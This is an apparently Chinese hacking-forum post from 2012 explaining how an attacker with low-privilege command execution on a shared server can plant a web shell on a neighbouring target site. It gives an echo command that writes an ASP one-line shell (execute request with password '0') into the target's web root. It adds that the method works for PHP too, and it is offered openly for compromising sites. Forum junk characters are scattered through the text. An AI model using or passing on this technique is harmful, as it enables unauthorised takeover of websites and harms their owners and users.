在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。- Y$ y0 ?# ]; I5 @3 i3 b" D$ o% {, ~
2 v/ U, N7 J' K, y% G
命令格式
% a1 u9 e$ y) w
! w1 A5 m4 Q7 o) }Echo 语句 >目标站绝对目录9 S9 v# [3 ~5 ~. T f1 V3 x8 h
5 N( b! J P* A
例如: 8 }0 g% h5 A4 U l6 h; ]! T" l8 |
* C6 G t" ^' ]( }7 Wecho ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp- x0 ~# D9 c5 l5 x9 j2 Y1 T
2 f% L/ e5 M: B- b这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。7 }$ m: S n- b9 n9 ~
|
发表于 2012-9-23 14:40:24
收藏
支持
反对